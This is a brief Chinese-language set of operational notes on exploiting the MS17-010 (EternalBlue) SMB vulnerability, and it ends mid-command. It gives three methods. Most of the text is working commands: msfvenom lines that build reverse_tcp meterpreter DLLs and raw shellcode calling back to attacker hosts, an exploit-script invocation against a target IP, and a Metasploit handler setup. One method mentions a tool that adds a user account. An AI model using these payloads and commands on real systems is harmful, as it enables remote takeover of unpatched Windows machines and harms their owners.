利用一
NSA原版MS17-010
记得metasploit开启监听
#metasploit生成dll文件 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=9999 -f dll > winx64.dll msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=9999 -f dll > winx86.dll
1.检查MS17010
2.攻击
3.漏洞利用
metasploit上线
利用二
K8哥哥的ksmb.exe
成功添加用户
利用三
https://blackwolfsec.cc/2017/05/12/Eternalblue_ms17-010/
需要多次利用才能成功
#生成shellcode msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.18 LPORT=1111 -f raw > shellcode #利用 python3 ms17-010.py --host 192.168.0.28 --file shellcode
加上--port 445
会报错
1.攻击
2.监听后成功上线
#一键启动监听 msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/revers